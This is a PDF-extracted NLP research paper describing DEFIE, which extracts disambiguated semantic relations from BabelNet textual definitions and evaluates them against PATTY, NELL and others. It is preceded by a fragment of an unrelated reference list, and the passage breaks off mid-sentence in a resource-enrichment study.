The 35th Annual IEEE International Conference on Computer Communications, 2016, pp. 1–9 [3] Li, L., Li, D., Su, Z., Jin, L., Huang, G.: 'Performance analysis and framework optimization of open source cloud storage system'. China Commun. 13(6), 2016, pp. 110–122 [4] Iliadis, I., Sotnikov, D., Ta-Shma, P., Venkatesan, V.: 'Reliability of geo-replicated Cloud storage systems'. In: 2014 IEEE 20th Pacific Rim International Symposium on Dependable Computing, 2014, pp. 169–179 [5] Han, Lin; Huang, Hao; Xie, Chang-Sheng: 'Multi-path data prefetching in mobile cloud storage'. In: Proceedings - 2014 International Conference on Cloud Computing and Big Data, CCBD 2014, March17, 2014, pp. 16-19 [6] Wang, Yan; Wang, Jinkuan: 'An Optimized Replica Distribution Method in Cloud Storage'. Journal of Control Science and Engineering, v 2017 [7] Chen, Ming-Hung; Tung, Yu-Chih; Hung, Shih-Hao; Lin, Kate Ching-Ju; Chou, Cheng-Fu: Availability Is Not Enough: Minimizing Joint Response Time in Peer-Assisted CloudStorage Systems. IEEE Systems Journal, v 10, n 4, December 2016, pp. 1424-1434 [8] Tysowski, P.K., Hasan, M.A.: 'Re-encryption-based keymanagement towards secure and scalable mobile applica-tions in clouds'. IACR Cryptology e Print Archive 668, 2011 [9] Purushothama, B.R; Shrinath, B.; Amberker, B.B. : 'Secure cloud storage service and limited proxy re-encryption for enforcing accesscontrol in public cloud'. International Journal of Information and Communication Technology, v5, n2, 2013, pp.167-186 work_vf3gpwvnzzet5j25nijp2jula4 ---- Large-Scale Information Extraction from Textual Definitions through Deep Syntactic and Semantic Analysis Claudio Delli Bovi, Luca Telesca and Roberto Navigli Department of Computer Science Sapienza University of Rome {dellibovi,navigli}@di.uniroma1.it luca.telesca@gmail.com Abstract We present DEFIE, an approach to large- scale Information Extraction (IE) based on a syntactic-semantic analysis of textual defini- tions. Given a large corpus of definitions we leverage syntactic dependencies to reduce data sparsity, then disambiguate the arguments and content words of the relation strings, and fi- nally exploit the resulting information to orga- nize the acquired relations hierarchically. The output of DEFIE is a high-quality knowledge base consisting of several million automati- cally acquired semantic relations.1 1 Introduction The problem of knowledge acquisition lies at the core of Natural Language Processing. Recent years have witnessed the massive exploitation of collabo- rative, semi-structured information as the ideal mid- dle ground between high-quality, fully-structured resources and the larger amount of cheaper (but noisy) unstructured text (Hovy et al., 2013). Col- laborative projects, like Freebase (Bollacker et al., 2008) and Wikidata (Vrandečić, 2012), have been being developed for many years and are continu- ously being improved. A great deal of research also focuses on enriching available semi-structured re- sources, most notably Wikipedia, thereby creating taxonomies (Ponzetto and Strube, 2011; Flati et al., 2014), ontologies (Mahdisoltani et al., 2015) and se- mantic networks (Navigli and Ponzetto, 2012; Nas- tase and Strube, 2013). These solutions, however, 1http://lcl.uniroma1.it/defie are inherently constrained to small and often pre- specified sets of relations. A more radical approach is adopted in systems like TEXTRUNNER (Etzioni et al., 2008) and REVERB (Fader et al., 2011), which developed from the Open Information Extraction (OIE) paradigm (Etzioni et al., 2008) and focused on the unconstrained extraction of a large number of relations from massive unstructured corpora. Ul- timately, all these endeavors were geared towards addressing the knowledge acquisition problem and tackling long-standing challenges in the field, such as Machine Reading (Mitchell, 2005). While earlier OIE approaches relied mostly on dependencies at the level of surface text (Etzioni et al., 2008; Fader et al., 2011), more recent work has focused on deeper language understanding at the level of both syntax and semantics (Nakashole et al., 2012; Moro and Navigli, 2013) and tackled chal- lenging linguistic phenomena like synonymy and polysemy. However, these issues have not yet been addressed in their entirety. Relation strings are still bound to surface text, lacking actual semantic con- tent. Furthermore, most OIE systems do not have a clear and unified ontological structure and re- quire additional processing steps, such as statisti- cal inference mappings (Dutta et al., 2014), graph- based alignments of relational phrases (Grycner and Weikum, 2014), or knowledge base unification pro- cedures (Delli Bovi et al., 2015), in order for their potential to be exploitable in real applications. In DEFIE the key idea is to leverage the linguistic analysis of recent semantically-enhanced OIE tech- niques while moving from open text to smaller cor- pora of dense prescriptive knowledge. The aim is 529 Transactions of the Association for Computational Linguistics, vol. 3, pp. 529–543, 2015. Action Editor: Sebastian Riedel. Submission batch: 5/2015; Revision batch: 8/2015; Published 10/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. Figure 1: Syntactic-semantic graph construction from a textual definition then to extract as much information as possible by unifying syntactic analysis and state-of-the-art dis- ambiguation and entity linking. Using this strategy, from an input corpus of textual definitions (short and concise descriptions of a given concept or entity) we are able to harvest fully disambiguated relation in- stances on a large scale, and integrate them auto- matically into a high-quality taxonomy of seman- tic relations. As a result a large knowledge base is produced that shows competitive accuracy and cov- erage against state-of-the-art OIE systems based on much larger corpora. Our contributions can be sum- marized as follows: • We propose an approach to IE that ties together syntactic dependencies and unified entity link- ing/word sense disambiguation, designed to discover semantic relations from a relatively small corpus of textual definitions; • We create a large knowledge base of fully disambiguated relation instances, ranging over named entities and concepts from available re- sources like WordNet and Wikipedia; • We exploit our semantified relation patterns to automatically build a rich, high-quality relation taxonomy, showing competitive results against state-of-the-art approaches. Our approach comprises three stages. First, we extract from our input corpus an initial set of seman- tic relations (Section 2); each relation is then scored and augmented with semantic type signatures (Sec- tion 3); finally, the augmented relations are used to build a relation taxonomy (Section 4). 2 Relation Extraction Here we describe the first stage of our approach, where a set of semantic relations is extracted from the input corpus. In the following, we refer to a re- lation instance as a triple t = 〈ai, r, aj〉 with ai and aj being the arguments and r the relation pattern. From each relation pattern rk the associated relation Rk is identified by the set of all relation instances where r = rk. In order to extract a large set of fully disambiguated relation instances we bring together syntactic and semantic analysis on a corpus of plain textual definitions. Each definition is first parsed and disambiguated (Figure 1a-b, Section 2.1); syntactic and semantic information is combined into a struc- tured graph representation (Figure 1c, Section 2.2) and relation patterns are then extracted as shortest paths between concept pairs (Section 2.3). The semantics of our relations draws on BabelNet (Navigli and Ponzetto, 2012), a wide-coverage mul- tilingual semantic network obtained from the auto- matic integration of WordNet, Wikipedia and other resources. This choice is not mandatory; however, inasmuch as it is a superset of these resources, Ba- belNet brings together lexicographic and encyclope- dic knowledge, enabling us to reach higher coverage while still being able to accommodate different dis- ambiguation strategies. For each relation instance t extracted, both ai,aj and the content words appear- ing in r are linked to the BabelNet inventory. In the remainder of the paper we identify BabelNet con- cepts or entities using a subscript-superscript nota- tion where, for instance, bandibn refers to the i-th BabelNet sense for the English word band. 530 2.1 Textual Definition Processing The first step of the process is the automatic extraction of syntactic information (typed depen- dencies) and semantic information (word senses and named entity mentions) from each textual definition. Each definition undergoes the following steps: Syntactic Analysis. Each textual defini- tion d is parsed to obtain a dependency graph Gd (Figure 1a). Parsing is carried out using C&C (Clark and Curran, 2007), a log-linear parser based on Combinatory Categorial Grammar (CCG). Although our algorithm seamlessly works with any syntactic formalism, CCG rules are especially suited to longer definitions and linguistic phenomena like coordinating conjunctions (Steedman, 2000). Semantic Analysis. Semantic analysis is based on Babelfy (Moro et al., 2014), a joint, state- of-the-art approach to entity linking and word sense disambiguation. Given a lexicalized semantic net- work as underlying structure, Babelfy uses a dense subgraph algorithm to identify high-coherence semantic interpretations of words and multi-word expressions across an input text. We apply Babelfy to each definition d, obtaining a sense mapping Sd from surface text (words and entity mentions) to word senses and named entities (Figure 1b). As a matter of fact, any disambiguation or entity linking strategy can be used at this stage. However, a knowledge-based unified approach like Babelfy is best suited to our setting, where context is limited and exploiting definitional knowledge as much as possible is key to attaining high-coverage results (as we show in Section 6.4). 2.2 Syntactic-Semantic Graph Construction The information extracted by parsing and dis- ambiguating a given definition d is unified into a syntactic-semantic graph Gsemd where concepts and entities identified in d are arranged in a graph struc- ture encoding their syntactic dependencies (Figure 1c). We start from the dependency graph Gd, as provided by the syntactic analysis of d in Section 2.1. Semantic information from the sense mappings Sd can be incorporated directly in the vertices of Gd by attaching available matches between words and senses to the corresponding vertices. Dependency graphs, however, encode dependencies solely on a word basis, while our sense mappings may include multi-word expressions (e.g. Pink Floyd1bn). In order to extract consistent information, subsets of vertices referring to the same concept or entity are merged to a single semantic node, which replaces the subgraph covered in the original dependency structure. Consider the example in Figure 1: an entity like Pink Floyd1bn covers two distinct and connected vertices in the dependency graph Gd, one for the noun Floyd and one for its modifier Pink. In the actual semantics of the sentence, as encoded in Gsemd (Figure 1c), these two vertices are merged to a single node referring to the entity Pink Floyd1bn (the English rock band), instead of being assigned individual word interpretations. Our procedure for building Gsemd takes as input a typed dependency graph Gd and a sense mapping Sd, both extracted from a given definition d. Gsemd is first populated with the vertices of Gd referring to disambiguated content words, merging those ver- tices covered by the same sense s ∈ Sd into a sin- gle node (like Pink Floyd1bn and Atom Heart Mother1bn in Figure 1c). Then, the remaining ver- tices and edges are added as in Gd, discarding non- disambiguated adjuncts and modifiers (like the and fifth in Figure 1). 2.3 Relation Pattern Identification At this stage, all the information in a given defi- nition d has been extracted and encoded in the cor- responding graph Gsemd (Section 2.2). We now con- sider those paths connecting entity pairs across the graph and extract the relation pattern r between two entities and/or concepts as the shortest path between the two corresponding vertices in Gsemd . This en- ables us to exclude less relevant information (typ- ically carried by adjuncts or modifiers) and reduce data sparsity in the overall extraction process. Our algorithm works as follows: given a textual definition d, we consider every pair of identified concepts or entities and compute the corresponding shortest path in Gsemd using the Floyd-Warshall al- gorithm (Floyd, 1962). The only constraint we en- force is that resulting paths must include at least one verb node. This condition filters out meaningless single-node patterns (e.g. two concepts connected 531 Algorithm 1 Relation Extraction procedure EXTRACTRELATIONSFROM(D) 1: R := ∅ 2: for each d in D do 3: Gd := dependencyParse(d) 4: Sd := disambiguate(d) 5: Gsemd := buildSemanticGraph(Gd,Sd) 6: for each 〈si,sj〉 in Sd do 7: 〈si,rij,sj〉 := shortestPath(si,sj) 8: R := R ∪{〈si,rij,sj〉} 9: filterPatterns(R,ρ) return R; with a preposition) and, given the prescriptive nature of d, is unlikely to discard semantically relevant at- tributes compacted in noun phrases. As an example, consider the two sentences “Mutter is the third al- bum by German band Rammstein” and “Atom Heart Mother is the fifth album by English band Pink Floyd”. In both cases, two valid shortest-path pat- terns are extracted. The first extracted shortest-path pattern is: X → is → album1bn → by → Y with ai=Mutter3bn, aj=Rammstein 1 bn for the first sentence and ai=Atom Heart Mother1bn, aj=Pink Floyd 1 bn for the second one. The sec- ond extracted shortest-path pattern is: X → is → Y with ai=Mutter3bn, aj=album 1 bn for the first sentence and ai=Atom Heart Mother1bn, aj=album 1 bn for the second one. In fact, our extraction process seamlessly discovers general knowledge (e.g. that Mutter3bn and Atom Heart Mother1bn are instances of the concept album 1 bn) and facts (e.g. that the entities Rammstein1bn and Pink Floyd1bn have an isAlbumBy relation with the two recordings). A pseudo-code for the entire extraction algorithm is shown in Algorithm 1: given a set of textual definitions D, a set of relations is generated over extractions R, with each relation R ⊂ R comprising relation instances extracted from D. Each d ∈ D is first parsed and disambiguated to produce a syntactic-semantic graph Gsemd (Sections 2.1-2.2); then all the concept pairs 〈si,sj〉 are examined to detect relation instances as shortest paths. Finally, we filter out from the resulting set all relations for which the number of extracted instances is below a fixed threshold ρ.2 The overall algorithm extracts over 20 million relation instances in our experimental setup (Section 5) with almost 256,000 distinct relations. 3 Relation Type Signatures and Scoring We further characterize the semantics of our re- lations by computing semantic type signatures for each R ⊂ R, i.e. by attaching a proper semantic class to both its domain and range (the sets of ar- guments occurring on the left and right of the pat- tern). As every element in the domain and range of R is disambiguated, we retrieve the corresponding senses and collect their direct hypernyms. Then we select the hypernym covering the largest subset of arguments as the representative semantic class for the domain (or range) of R. We extract hypernyms using BabelNet, where taxonomic information cov- ers both general concepts (from the WordNet taxon- omy (Fellbaum, 1998)) and named entities (from the Wikipedia Bitaxonomy (Flati et al., 2014)). From the distribution of direct hypernyms over domain and range arguments of R we estimate the quality of R and associate a confidence value with its relation pattern r. Intuitively we want to assign higher confidence to relations where the correspond- ing distributions have low entropy. For instance, if both sets have a single hypernym covering all argu- ments, then R arguably captures a well-defined se- mantic relation and should be assigned high confi- dence. For each relation R, we compute: HR = − n∑ i=1 p(hi) log2 p(hi) (1) where hi(i = 1, ...,n) are all the distinct argument hypernyms over the domain and range of R and probabilities p(hi) are estimated from the propor- tion of arguments covered in such sets. The lower HR, the better semantic types of R are defined. As a matter of fact, however, some valid but over-general relations (e.g. X is a Y, X is used for Y ) have inher- ently high values of HR. To obtain a balanced score, 2In all the experiments of Section 6 we set ρ = 10. 532 Pattern Score Entropy X directed by Y 4 025.80 1.74 X known for Y 2 590.70 3.65 X is election district1bn of Y 110.49 0.83 X is composer1bn from Y 39.92 2.08 X is street1bn named after Y 1.91 2.24 X is village2bn founded in 1912 in Y 0.91 0.18 Table 1: Examples of relation scores Figure 2: Precision against score(R) (a) and HR (b) we therefore consider two additional factors, i.e. the number of extracted instances for R and the length of the associated pattern r, obtaining the following empirical measure: score(R) = |SR| (HR + 1) length(r) (2) with SR being the set of extracted relation instances for R. The +1 term accounts for cases where HR = 0. As shown in the examples of Table 1, relations with rather general patterns (such as X known for Y ) achieve higher scores compared to very specific ones (like X is village2bn founded in 1912 in Y ) de- spite higher entropy values. We validated our mea- sure on the samples of Section 6.1, computing the overall precision for different score thresholds. The monotonic decrease of sample precision in Figure 2a shows that our measure captures the quality of extracted patterns better than HR (Figure 2b). 4 Relation Taxonomization In the last stage of our approach our set of ex- tracted relations is arranged automatically in a rela- tion taxonomy. The process is carried out by com- paring relations pairwise, looking for hypernymy- hyponymy relationships between the corresponding relation patterns; we then build our taxonomy by connecting with an edge those relation pairs for which such a relationship is found. Both the relation Figure 3: Hypernym (a) and substring (b) generalizations taxonomization procedures described here examine noun nodes across each relation pattern r, and con- sider for taxonomization only those relations whose patterns are identical except for a single noun node.3 4.1 Hypernym Generalization A direct way of identifying hypernym/hyponym noun nodes across relation patterns is to analyze the semantic information attached to them. Given two relation patterns ri and rj, differing only in respect of the noun nodes ni and nj, we first look at the as- sociated concepts or entities, ci and cj, and retrieve the corresponding hypernym sets, H(ci) and H(cj). Hypernym sets are obtained by iteratively collecting the superclasses of ci and cj from the semantic network of BabelNet, up to a fixed height. For instance, given ci = album1bn, H(ci) = {work of art1bn, creation 2 bn, artifact 1 bn}, and given cj = Rammstein1bn, H(cj) = {band2bn, musical ensemble1bn, organization 1 bn}. Once we have H(ci) and H(cj), we just check whether cj ∈H(ci) or ci ∈ H(cj) (Figure 3a). According to which is the case, we conclude that rj is a generalization of ri, or that ri is a generalization of rj. 4.2 Substring Generalization The second procedure focuses on the noun (or compound) represented by the node. Given two re- lation patterns, ri and rj, we apply the following heuristic: from one of the two nouns, be it ni, any adjunct or modifier is removed, retaining the sole head word n̂i. Then, n̂i is compared with nj and, if n̂i = nj, we assume that the relation rj is a gen- eralization of ri (Figure 3b). 3The simplifying assumption here is that two given relation patterns may be in a hypernymy-hyponymy relationship only when their plain syntactic structure is equivalent (e.g. is N1 by and is N2 by, with N1 and N2 being two distinct noun nodes). 533 DEFIE NELL PATTY REVERB WISENET Freebase DBpedia Distinct relations 255 881 298 1 631 531 664 746 245 935 1 894 1 368 Distinct relations (disambiguated) 240 618 - - - - - - Average extractions per relation 81.68 7 013.03 9.68 22.16 9.24 127 727.99 24 451.48 Distinct relation instances 20 352 903 2 089 883 15 802 946 14 728 268 2 271 807 241 897 882 33 449 631 Distinct concepts/entities involved 2 398 982 1 996 021 1 087 907 3 327 425 1 636 307 66 988 232 10 338 501 Table 2: Comparative statistics on the relation extraction process 5 Experimental Setup Input. The input corpus used for the relation extraction procedure is the full set of English textual definitions in BabelNet 2.5 (Navigli and Ponzetto, 2012).4 In fact, any set of textual definitions can be provided as input to DEFIE, ranging from existing dictionaries (like WordNet or Wiktionary) to the set of first sentences of Wikipedia articles.5 As it is a merger for various different resources of this kind, BabelNet provides a large heterogeneous set com- prising definitions from WordNet, Wikipedia, Wik- tionary, Wikidata and OmegaWiki. To the best of our knowledge, this set constitutes the largest avail- able corpus of definitional knowledge. We therefore worked on a total of 4,357,327 textual definitions from the English synsets of BabelNet’s knowledge base. We then used the same version of BabelNet as the underlying semantic network structure for dis- ambiguating with Babelfy.6 Statistics. Comparative statistics are shown in Table 2. DEFIE extracts 20,352,903 relation in- stances, out of which 13,753,133 feature a fully dis- ambiguated pattern, yielding an average of 3.15 dis- ambiguated relation instances extracted from each definition. After the extraction process, our knowl- edge base comprises 255,881 distinct semantic re- lations, 94% of which also have disambiguated content words in their patterns. DEFIE extracts a considerably larger amount of relation instances compared to similar approaches, despite the much smaller amount of text used. For example, we man- aged to harvest over 5 million relation instances more than PATTY, using a much smaller corpus (sin- 4babelnet.org 5According to the Wikipedia guidelines, an article should begin with a short declarative sentence, defining what (or who) is the subject and why it is notable. 6babelfy.org gle sentences as opposed to full Wikipedia articles) and generating a number of distinct relations that was six times less than PATTY’s. As a result, we obtained an average number of extractions that was substantially higher than those of our OIE competi- tors. This suggests that DEFIE is able to exploit the nature of textual definitions effectively and general- ize over relation patterns. Furthermore, our semantic analysis captured 2,398,982 distinct arguments (ei- ther concept or named entities), outperforming al- most all open-text systems examined. Evaluation. All the evaluations carried out in Section 6 were based on manual assessment by two human judges, with an inter-annotator agreement, as measured by Cohen’s kappa coefficient, above 70% in all cases. In these evaluations we compared DE- FIE with the following OIE approaches: • NELL (Carlson et al., 2010) with knowledge base beliefs updated to November 2014; • PATTY (Nakashole et al., 2012) with Free- base types and pattern synsets from the English Wikipedia dump of June 2011; • REVERB (Fader et al., 2011), using the set of normalized relation instances from the ClueWeb09 dataset; • WISENET (Moro and Navigli, 2012; Moro and Navigli, 2013) with relational phrases from the English Wikipedia dump of December 2012. In addition, we also compared our knowledge base with up-to-date human-contributed resources, namely Freebase (Bollacker et al., 2008) and DBpe- dia (Lehmann et al., 2014), both from the dumps of April/May 2014. 534 Top 100 Top 250 Rand 100 Rand 250 DEFIE 0.93±0.01 0.91±0.02 0.79±0.02 0.81±0.08 PATTY 0.93±0.05 N/A 0.80±0.08 N/A Table 3: Precision of relation patterns NELL PATTY REVERB WISENET Freebase DBpedia Top 100 .571 .238 .214 .155 .571 .461 Rand 100 .942 .711 .596 .635 .904 .880 Table 4: Novelty of the extracted information 6 Experiments 6.1 Quality of Relations We first assessed the quality and the semantic consistency of our relations using manual evalua- tion. We ranked our relations according to their score (Section 3) and then created two samples (of size 100 and 250 respectively) of the top scoring relations. In order to evaluate the long tail of less confident relations, we created another two sam- ples of the same size with randomly extracted re- lations. We presented these samples to our human judges, accompanying each relation with a set of 50 argument pairs and the corresponding textual defini- tions from BabelNet. For each item in the sample we asked whether it represented a meaningful rela- tion and whether the extracted argument pairs were consistent with this relation and the corresponding definitions. If the answer was positive, the rela- tion was considered as correct. Finally we esti- mated the overall precision of the sample as the proportion of correct items. Results are reported in Table 3 and compared to those obtained by our closest competitor, PATTY, in the setting of Sec- tion 5. In PATTY the confidence of a given pattern was estimated from its statistical strength (Nakas- hole et al., 2012). As shown in Table 3, DEFIE achieved a comparable level of accuracy in every sample. An error analysis identified most errors as related to the vagueness of some short and general patterns, e.g. X take Y, X make Y. Others were re- lated to parsing (e.g. in labeling the head word of complex noun phrases) or disambiguation. In ad- dition, we used the same samples to estimate the novelty of the extracted information in compari- son to currently available resources. We examined each correct relation pattern and looked manually for an equivalent relation in the knowledge bases Gold Standard DEFIE WISENET PATTY 163 131 129 126 REVERB Freebase DBpedia 122 69 39 Table 5: Coverage of semantic relations of both our OIE competitors and human-contributed resources. For instance, given the relation X born in Y, NELL and REVERB have the equivalent rela- tions personborninlocation and is born in, while Freebase and DBpedia have Place of birth and birthPlace respectively. We then computed the proportion of ‘new’ relations among those previously labeled as correct by our human judges. Results are shown in Table 4 for both the top 100 sample and the random sample. The high proportion of relations not appearing in existing re- sources (especially across the random samples) sug- gests that DEFIE is capable of discovering informa- tion not obtainable from available knowledge bases, including very specific relations (X is blizzard in Y, X is Mayan language spoken by Y, X is government- owned corporation in Y ), as well as general but un- usual ones (X used by writer of Y ). 6.2 Coverage of Relations To assess the coverage of DEFIE we first tested our extracted relations on a public dataset de- scribed in (Nakashole et al., 2012) and consist- ing of 163 semantic relations manually annotated from five Wikipedia pages about musicians. Fol- lowing the line of previous works (Nakashole et al., 2012; Moro and Navigli, 2013), for each an- notation we sought a relation in our knowledge base carrying the same semantics. Results are re- ported in Table 5. Consistently with the results in Table 4, the proportion of novel information places DEFIE in line with its closest competitors, achieving a coverage of 80.3% with respect to the gold standard. Examples of relations not cov- ered by our competitors are hasFatherInLaw and hasDaughterInLaw. Furthermore, relations holding between entities and general concepts (e.g. critizedFor, praisedFor, sentencedTo), are captured only by DEFIE and REVERB (which, however, lacks any argument semantics). We also assessed the coverage of resources based 535 Freebase DBpedia NELL Random 100 83% 81% 89% Table 6: Coverage of manually curated resources PATTY WISENET Random 100 66% 69% Table 7: Coverage of individual relation instances Hyp. Gen. Substr. Gen. PATTY (Top) PATTY (Rand) Precision 0.87±0.03 0.90±0.02 0.85±0.07 0.62±0.09 # Edges 44 412 20 339 Density 1.89×10−6 7.64×10−9 Table 8: Precision and coverage of the relation taxonomy on human-defined semantic relations: we extracted three random samples of 100 relations from Free- base, DBpedia and NELL and looked for seman- tically equivalent relations in our knowledge base. As shown in Table 6, DEFIE reports a coverage be- tween 81% and 89% depending on the resource, fail- ing to cover mostly relations that refer to numerical properties (e.g. numberOfMembers). Finally, we tested the coverage of DEFIE over in- dividual relation instances. We selected a random sample of 100 triples from the two closest com- petitors exploiting textual corpora, i.e. PATTY and WISENET. For each selected triple 〈ai, r, aj〉, we sought an equivalent relation instance in our knowl- edge base, i.e. one comprising ai and aj and a re- lation pattern expressing the same semantic relation of r. Results in Table 7 show a coverage greater than 65% over both samples. Given the dramatic re- duction of corpus size and the high precision of the items extracted, these figures demonstrate that def- initional knowledge is extremely valuable for rela- tion extraction approaches. This might suggest that, even in large-scale OIE-based resources, a substan- tial amount of knowledge is likely to come from a rather smaller subset of definitional sentences within the source corpus. 6.3 Quality of Relation Taxonomization We evaluated our relation taxonomy by manually assessing the accuracy of our taxonomization heuris- tics. Then we compared our results against PATTY, the only system among our closest competitors that generates a taxonomy of relations. The setting for this evaluation was the same of that of Section 6.1. However, as we lacked a confidence measure in this case, we just extracted a random sample of 200 hy- pernym edges for each generalization procedure. We presented these samples to our human judges and, for each hypernym edge, we asked whether the cor- responding pair of relations represented a correct generalization. We then estimated the overall preci- sion as the proportion of edges regarded as correct. Results are reported in Table 8, along with PATTY’s results in the setting of Section 5; as PATTY’s edges are ranked by confidence, we consid- ered both its top confident 100 subsumptions and a random sample of the same size. As shown in Table 8, DEFIE outperforms PATTY in terms of precision, and generates more than twice the number of edges overall. HARPY (Grycner and Weikum, 2014) en- riches PATTY’s taxonomy with 616,792 hypernym edges, but its alignment algorithm, in the setting of Section 5, also includes transitive edges and still yields a sparser taxonomy compared to ours, with a graph density of 2.32×10−7. Generalization errors in our taxonomy are mostly related to disambigua- tion errors or flaws in the Wikipedia Bitaxonomy (e.g. the concept Titular Church1bn marked as hyponym of Cardinal1bn). 6.4 Quality of Entity Linking and Disambiguation We evaluated the disambiguation stage of DEFIE (Section 2.1) by comparing Babelfy against other state-of-the-art entity linking systems. In order to compare different disambiguation outputs we se- lected a random sample of 60,000 glosses from the input corpus of textual definitions (Section 5) and ran the relation extraction algorithm (Sections 2.1- 2.3) using a different competitor in the disambigua- tion step each time. We eventually used the map- pings in BabelNet to express each output using a common dictionary and sense inventory. The coverage obtained by each competitor was as- sessed by looking at the number of distinct relations extracted in the process, the total number of relation instances extracted, the number of distinct concepts or entities involved, and the average number of se- mantic nodes within the relation patterns. For each competitor, we also assessed the precision obtained by evaluating the quality and semantic consistency of the relation patterns, in the same manner as in 536 # Relations # Triples # Entities Average Sem. Nodes Babelfy 96 434 233 517 79 998 2.37 TagME 2.0 88 638 226 905 89 318 1.67 WAT 24 083 56 503 38 147 0.39 DBpedia Spotlight 67 377 140 711 38 254 1.45 Wikipedia Miner 39 547 88 777 37 036 0.96 Table 9: Coverage for different disambiguation systems Relations Relation instances Babelfy 82.3% 76.6% TagME 2.0 76.0% 62.0% WAT 84.6% 72.6% DBpedia Spotlight 70.5% 62.6% Wikipedia Miner 71.7% 56.0% Table 10: Precision for different disambiguation systems Section 6.1, both at the level of semantic relations (on the top 150 relation patterns) and at the level of individual relation instances (on a randomly ex- tracted sample of 150 triples). Results are shown in Tables 9 and 10 for Babelfy and the following sys- tems: • TagME 2.07 (Ferragina and Scaiella, 2012), which links text fragments to Wikipedia based on measures like sense commonness and keyphraseness (Mihalcea and Csomai, 2007); • WAT (Piccinno and Ferragina, 2014), an en- tity annotator that improves over TagME and features a re-designed spotting, disambiguation and pruning pipeline; • DBpedia Spotlight8 (Mendes et al., 2011), which annotates text documents with DBpedia URIs using scores such as prominence, topical relevance and contextual ambiguity; • Wikipedia Miner9 (Milne and Witten, 2013), which combines parallelized processing of Wikipedia dumps, relatedness measures and annotation features. As shown in Table 9, Babelfy outperforms all its competitors in terms of coverage and, due to its unified word sense disambiguation and entity link- ing approach, extracts semantically richer patterns 7tagme.di.unipi.it 8spotlight.dbpedia.org 9wikipediadataminer.cms.waikato.ac.nz # Definitions Proportion (%) Wikipedia 3 899 087 89.50 Wikidata 364 484 8.35 WordNet 41 356 0.95 Wiktionary 39 383 0.90 OmegaWiki 13 017 0.30 Table 11: Composition of the input corpus by source # Relations # Relation instances Avg. Extractions Wikipedia 251 954 19 455 992 77.58 Wikidata 5 414 1 033 732 191.01 WordNet 2 260 128 200 56.73 Wiktionary 2 863 143 990 50.52 OmegaWiki 1 168 45 818 39.45 Table 12: Impact of each source on the extraction step with 2.37 semantic nodes on the average per sen- tence. This reflects on the quality of semantic rela- tions, reported in Table 10, with an overall increase of precision both in terms of relations and in terms of individual instances; even though WAT shows slightly higher precision over relations, its consid- erably lower coverage yields semantically poor pat- terns (0.39 semantic nodes on the average) and im- pacts on the overall quality of relations, where some ambiguity is necessarily retained. As an example, the pattern X is station in Y, extracted from WAT’s disambiguation output, covers both railway stations and radio broadcasts. Babelfy produces, instead, two distinct relation patterns for each sense, tag- ging station as railway station1bn for the for- mer and station5bn for the latter. 6.5 Impact of Definition Sources We carried out an empirical analysis over the input corpus in our experimental setup, studying the impact of each source of textual definitions in isolation. In fact, as explained in Section 5, BabelNet’s textual definitions come from various resources: WordNet, Wikipedia, Wikidata, Wik- tionary and OmegaWiki. Table 11 shows the com- position of the input corpus with respect to each of these definition sources. The distribution is rather skewed, with the vast majority of definitions coming from Wikipedia (almost 90% of the input corpus). We ran the relation extraction algorithm (Sections 2.1-2.3) on each subset of the input corpus. As in previous experiments, we report the number of re- lation instances extracted, the number of distinct re- 537 # Wikipages # Sentences # Extractions Precision All 14 072 225 867 39 684 61.8% Top 100 10 334 161 769 13 687 59.0% Table 13: Extraction results over non-definitional text # Relation instances # Relations # Edges PATTY (definitions) 3 212 065 41 593 4 785 PATTY (Wikipedia) 15 802 946 1 631 531 20 339 Our system 20 807 732 255 881 44 412 Table 14: Performance of PATTY on definitional data lations, and the average number of extractions for each relation. Results, as shown in Table 12, are consistent with the composition of the input cor- pus in Table 11: by relying solely on Wikipedia’s first sentences, the extraction algorithm discovered 98% of all the distinct relations identified across the whole input corpus, and 93% of the total num- ber of extracted instances. Wikidata provides more than 1 million extractions (5% of the total) but def- initions are rather short and most of them (44.2%) generate only is-a relation instances. The remain- ing sources (WordNet, Wiktionary, OmegaWiki) ac- count for less than 2% of the extractions. 6.6 Impact of the Approach vs. Impact of the Data DEFIE’s relation extraction algorithm is explic- itly designed to target textual definitions. Hence, the result it achieves is due to the mutual contribution of two key features: an OIE approach and the use of definitional data. In order to decouple these two factors and study their respective im- pacts, we carried out two experiments: first we applied DEFIE to a sample of non-definitional text; then we applied our closest competitor, PATTY, on the same definition corpus described in Section 5. Extraction from non-definitional text. We selected a random sample of Wikipedia pages from the English Wikipedia dump of October 2012. We processed each sentence as in Sections 2.1-2.2 and extracted instances of those relations produced by DEFIE in the original definitional setting (Section 5); we then automatically filtered out those instances where the arguments’ hypernyms did not agree with the semantic types of the relation. We evaluated manually the quality of extractions on a sample of Source Label Target enzyme1bn catalyzes reaction 1 bn of chemical 1 bn album1bn recorded by rock group 1 bn officier1bn commanded brigade 1 bn of army unit 1 bn bridge1bn crosses over river 1 bn academic journal1bn covers research 1 bn in science 1 bn organization1bn has headquarters 3 bn in city 1 bn Table 15: Examples of augmented semantic edges 100 items (as in Section 6.1) for both the full set of extracted instances and for the subset of extractions from the top 100 scoring relations. Results are reported in Table 13: in both cases, precision figures show that extraction quality drops consistently in comparison to Section 6.1, suggesting that our extraction approach by itself is less accurate when moving to more complex sentences (with, e.g., subordinate clauses or coreferences). PATTY on textual definitions. Since no open- source implementation of PATTY is available, we implemented a version of the algorithm which uses BABELFY for named entity disambiguation. We then ran it on our corpus of BabelNet definitions and compared the results against those originally ob- tained by PATTY (on the entire Wikipedia corpus) and those obtained by DEFIE. Figures are reported in Table 14 in terms of number of extracted relation instances, distinct relations and hypernym edges in the relation taxonomy. Results show that the dra- matic reduction of corpus size affects the support sets of PATTY’s relations, worsening both coverage and generalization capability. 6.7 Preliminary Study: Resource Enrichment To further investigate the potential of our ap- proach, we explored the application of DEFIE to the enrichment of existing resources. We focused on BabelNet as a case study. In BabelNet’s seman- tic network, nodes representing concepts and en- tities are only connected via lexicograhic relation- ships from WordNet (hypernymy, meronymy, etc.) or unlabeled edges derived from Wikipedia hyper- links. Our extraction algorithm has the potential to provide useful information to both augment unla- beled edges with labels and explicit semantic con- tent, and create additional connections based on se- mantic relations. Examples are shown in Table 15. 538 # Concept pairs # Unlabeled # Labeled Type signatures 1 403 299 90 Relation instances 8 493 588 3 401 677 551 331 Table 16: Concept pairs and associated edges in BabelNet We carried out a preliminary analysis over all dis- ambiguated relations with at least 10 extracted in- stances. For each relation pattern r, we first exam- ined the concept pairs associated with its type signa- tures and looked in BabelNet for an unlabeled edge 